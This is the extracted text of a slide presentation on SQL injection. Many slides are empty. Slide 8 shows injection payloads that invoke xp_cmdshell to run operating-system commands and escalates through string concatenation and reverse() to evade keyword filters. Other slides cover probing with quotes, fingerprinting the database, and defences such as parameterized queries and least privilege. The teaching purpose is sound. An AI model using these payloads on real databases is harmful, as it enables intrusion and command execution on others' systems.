  • 8. Let's play Hide and Seek Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; -- Defender: Disallow double quotes: Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; -- Defender: Filter out string “xp_cmdshell” Attacker: ';declare @a varchar(1000); set @a = 'master.dbo.xp_' + 'cmdshell dir'; exec (@a);-- Defender: Filter out “xp”, “cmd”, “shell”, …. Attacker: ';declare @a varchar(1000); set @a = reverse('rid llehsdmc_px.obd.retsam'); exec (@a);--
  • 10.
  • 11. Submit two single quotation and observe the result
  • 12. Identify the database (e.g.Oracle: ‘||’FOO MS-SQL: ‘+’FOO MySQL: ‘ ‘FOO [note the space btw the 2 quotes]
  • 13.
  • 14.
  • 15.
  • 16.
  • 18. Demo Using UNION Operator
  • 20.
  • 21. Process SQL queries using prepared statements, parameterized queries, or stored procedures.
  • 22. Enforce least privilege
  • 23. Avoid detailed error messages
  • 24.